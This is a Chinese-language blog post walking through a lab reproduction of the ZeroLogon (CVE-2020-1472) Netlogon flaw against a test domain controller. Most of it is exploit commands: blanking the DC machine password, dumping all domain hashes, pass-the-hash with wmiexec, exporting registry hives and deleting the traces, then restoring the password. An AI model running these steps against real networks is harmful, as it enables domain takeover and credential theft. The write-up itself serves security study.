<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="一、漏洞简介NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口，被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器，也用于 NTP 响应认证以及更新计算机域密码。 微软 MSRC 于 8 月 11 日 发布了 Netlogon 特权提升漏洞安全通告。此漏洞 CVE 编号 CVE-2020-1472， CVSS 评分：10.0。由 Secu">
<meta property="og:type" content="article">
<meta property="og:title" content="Netlogon 特权提升漏洞（CVE-2020-1472) 复现">
<meta property="og:url" content="http://example.com/2021/12/08/netlogon/index.html">
<meta property="og:site_name" content="Brich">
<meta property="og:description" content="一、漏洞简介NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口，被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器，也用于 NTP 响应认证以及更新计算机域密码。 微软 MSRC 于 8 月 11 日 发布了 Netlogon 特权提升漏洞安全通告。此漏洞 CVE 编号 CVE-2020-1472， CVSS 评分：10.0。由 Secu">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639009575/Xnip2021-12-09_08-24-49_t2bs2i.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639009762/Xnip2021-12-09_08-29-09_v8oqkk.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639010187/Xnip2021-12-09_08-36-09_o4rody.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639010358/Xnip2021-12-09_08-39-06_zdzbye.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639011283/Xnip2021-12-09_08-54-31_qxy74g.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639011589/Xnip2021-12-09_08-58-07_k9cmjj.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639011589/Xnip2021-12-09_08-58-16_dxssdy.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639011589/Xnip2021-12-09_08-59-10_nhmtb0.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639012153/Xnip2021-12-09_09-07-48_vhncqi.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639012261/Xnip2021-12-09_09-10-27_db4qj6.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639012427/Xnip2021-12-09_09-12-59_xdm8ev.png">
<meta property="og:image" content="https://img1.baidu.com/it/u=3207059566,351762776&fm=26&fmt=auto">
<meta property="article:published_time" content="2021-12-08T11:35:05.000Z">
<meta property="article:modified_time" content="2022-02-12T13:51:55.562Z">
<meta property="article:author" content="lin">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://res.cloudinary.com/lin1109/image/upload/v1639009575/Xnip2021-12-09_08-24-49_t2bs2i.png">
    
    
      
        
          <link rel="shortcut icon" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
      
        
          <link rel="icon" type="image/png" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
    
    <!-- title -->
    <title>Netlogon 特权提升漏洞（CVE-2020-1472) 复现</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2021/12/11/log4j/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2021/11/18/xsspractice/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/12/08/netlogon/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/12/08/netlogon/&text=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/12/08/netlogon/&is_video=false&description=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Netlogon 特权提升漏洞（CVE-2020-1472) 复现&body=Check out this article: http://example.com/2021/12/08/netlogon/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/12/08/netlogon/&name=Netlogon 特权提升漏洞（CVE-2020-1472) 复现&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/12/08/netlogon/&t=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">一、漏洞简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="toc-number">2.</span> <span class="toc-text">二、漏洞影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">3.</span> <span class="toc-text">三、漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">四、漏洞利用</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Netlogon 特权提升漏洞（CVE-2020-1472) 复现
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">lin</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-12-08T11:35:05.000Z" itemprop="datePublished">2021-12-08</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="一、漏洞简介"><a href="#一、漏洞简介" class="headerlink" title="一、漏洞简介"></a>一、漏洞简介</h2><p>NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口，被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器，也用于 NTP 响应认证以及更新计算机域密码。</p>
<p>微软 MSRC 于 8 月 11 日 发布了 Netlogon 特权提升漏洞安全通告。此漏洞 CVE 编号 CVE-2020-1472， CVSS 评分：10.0。由 Secura 公司的 Tom Tervoort 发现提交并命名为 ZeroLogon。</p>
<p>攻击者通过 NetLogon，建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。</p>
<h2 id="二、漏洞影响版本"><a href="#二、漏洞影响版本" class="headerlink" title="二、漏洞影响版本"></a>二、漏洞影响版本</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Windows Server 2008 R2 for x64-based Systems Service Pack 1</span><br><span class="line"></span><br><span class="line">Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</span><br><span class="line"></span><br><span class="line">Windows Server 2012</span><br><span class="line"></span><br><span class="line">Windows Server 2012 Windows Server 2012 (Server Core installation)</span><br><span class="line"></span><br><span class="line">Windows Server 2012 R2</span><br><span class="line"></span><br><span class="line">Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation)</span><br><span class="line"></span><br><span class="line">Windows Server 2016</span><br><span class="line"></span><br><span class="line">Windows Server 2016 Windows Server 2016 (Server Core installation)</span><br><span class="line"></span><br><span class="line">Windows Server 2019</span><br><span class="line"></span><br><span class="line">Windows Server 2019 Windows Server 2019 (Server Core installation)</span><br><span class="line"></span><br><span class="line">Windows Server, version 1903 (Server Core installation)</span><br><span class="line"></span><br><span class="line">Windows Server, version 1909 (Server Core installation)</span><br><span class="line"></span><br><span class="line">Windows Server, version 2004 (Server Core installation)</span><br></pre></td></tr></table></figure>

<h2 id="三、漏洞原理"><a href="#三、漏洞原理" class="headerlink" title="三、漏洞原理"></a>三、漏洞原理</h2><p>微软在 Netlogon 协议中没有正确使用加密算法而导致的漏洞，由于微软在进行 AES 加密运算过程中，使用了 AES-CFB8 模式并且错误的将 IV 设置为全零，这使得攻击者在明文 (client chanllenge)、IV 等要素可控的情况下，存在较高概率使得产生的密文为全零。</p>
<p>具体可以参考：ZeroLogon (CVE-2020-1472) 分析与狩猎 - 先知社区 (aliyun.com)</p>
<h2 id="四、漏洞利用"><a href="#四、漏洞利用" class="headerlink" title="四、漏洞利用"></a>四、漏洞利用</h2><p>这里环境用之前复现 CVE-2021-1675 的环境</p>
<p>域控：172.16.122.91 （Windows Server 2016 ）</p>
<p>主域：jhc.cn</p>
<p>域成员机： 172.16.122.252 （win10） 假设已取得权限</p>
<p>攻击机：不在内网中，但是能访问到域控 （parrot os）</p>
<p>查询域控主机名</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net <span class="built_in">group</span> <span class="string">&quot;domain controllers&quot;</span> /domain</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639009575/Xnip2021-12-09_08-24-49_t2bs2i.png"></p>
<p>检测是否存在 ZeroLogon</p>
<p>poc 下载地址：<a target="_blank" rel="noopener" href="https://github.com/SecuraBV/CVE-2020-1472">https://github.com/SecuraBV/CVE-2020-1472</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python zerologon_tester.py DC 172.16.122.91</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639009762/Xnip2021-12-09_08-29-09_v8oqkk.png"></p>
<p>Success! DC can be fully compromised by a Zerologon attack.</p>
<p>使用 exp 将域控机器账户密码重置为空（这里置空的是域控所在机器的机器管理员密码，而非域控密码，域控所在机器密码更改可能会影响与其他域的通信或者域控上的 dns 等功能。导致脱域，因此攻击完之后，需要恢复机器密码）</p>
<p>exp 下载地址：<a target="_blank" rel="noopener" href="https://github.com/risksense/zerologon">https://github.com/risksense/zerologon</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python set_empty_pw.py  DC 172.16.122.91</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639010187/Xnip2021-12-09_08-36-09_o4rody.png"></p>
<p>Success! DC should now have the empty string as its machine password.</p>
<p>使用 DCSync 导出域内所有用户的凭证</p>
<p>需要安装 impacket 工具包</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python secretsdump.py jhc.cn/DC\<span class="variable">$@172</span>.16.122.91 -just-dc -no-pass</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639010358/Xnip2021-12-09_08-39-06_zdzbye.png"></p>
<p>得到域管 hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c29a582a2aba5644f047dd8ad1d2810:::</span><br></pre></td></tr></table></figure>

<p>pth 横向</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python ./wmiexec.py -hashes :1c29a582a2aba5644f047dd8ad1d2810 administrator@172.16.122.91</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639011283/Xnip2021-12-09_08-54-31_qxy74g.png"></p>
<p>导出 sam system 等文件到本地，获取域控机器上本地保存之前的 hash 值用于恢复，不然就脱域了</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SYSTEM system.save</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SAM sam.save</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SECURITY security.save</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639011589/Xnip2021-12-09_08-58-07_k9cmjj.png"></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lget system.save</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lget sam.save</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lget security.save </span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639011589/Xnip2021-12-09_08-58-16_dxssdy.png"></p>
<p>在攻击机当前目录会多出三个文件</p>
<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639011589/Xnip2021-12-09_08-59-10_nhmtb0.png"></p>
<p>清理痕迹，删除域控上导出的文件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">del</span> /f system.save</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">del</span> /f sam.save</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">del</span> /f security.save</span><br></pre></td></tr></table></figure>

<p>使用 sam.save、security.save、system.save 这些文件来还原域控机器上的 Ntlm Hash 值，用于恢复密码，不然就脱域了</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL</span><br></pre></td></tr></table></figure>

<p>拿到 $MACHINE.ACC 的 hash 值进行恢复</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:083d08d11d453365d41177413c4d8ca8</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639012153/Xnip2021-12-09_09-07-48_vhncqi.png"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python reinstall_original_pw.py  DC 172.16.122.91 083d08d11d453365d41177413c4d8ca8</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639012261/Xnip2021-12-09_09-10-27_db4qj6.png"></p>
<p>Success! DC machine account should be restored to it’s original value. You might want to secretsdump again to check.</p>
<p>使用脚本检测一下是否恢复成功</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python secretsdump.py DC/DC\<span class="variable">$@172</span>.16.122.91 -just-dc -no-pass</span><br></pre></td></tr></table></figure>

<p>现在使用空密码去获取域内所有用户 hash 已经不行了</p>
<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1639012427/Xnip2021-12-09_09-12-59_xdm8ev.png"></p>
<p>使用 zerologon 攻击完之后一定要记得恢复域控机器账户密码，不然会导致脱域。等着呜噜呜噜呜噜</p>
<p><img src="https://img1.baidu.com/it/u=3207059566,351762776&fm=26&fmt=auto"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/vlog/">vlog</a></li>
         
          <li><a href="/friends/">Friends</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">一、漏洞简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="toc-number">2.</span> <span class="toc-text">二、漏洞影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">3.</span> <span class="toc-text">三、漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">四、漏洞利用</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/12/08/netlogon/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/12/08/netlogon/&text=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/12/08/netlogon/&is_video=false&description=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Netlogon 特权提升漏洞（CVE-2020-1472) 复现&body=Check out this article: http://example.com/2021/12/08/netlogon/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/12/08/netlogon/&title=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/12/08/netlogon/&name=Netlogon 特权提升漏洞（CVE-2020-1472) 复现&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/12/08/netlogon/&t=Netlogon 特权提升漏洞（CVE-2020-1472) 复现"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2019-2022
    lin
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"superSample":2,"width":200,"height":350,"position":"right","hOffset":0,"vOffset":-20},"mobile":{"show":false,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
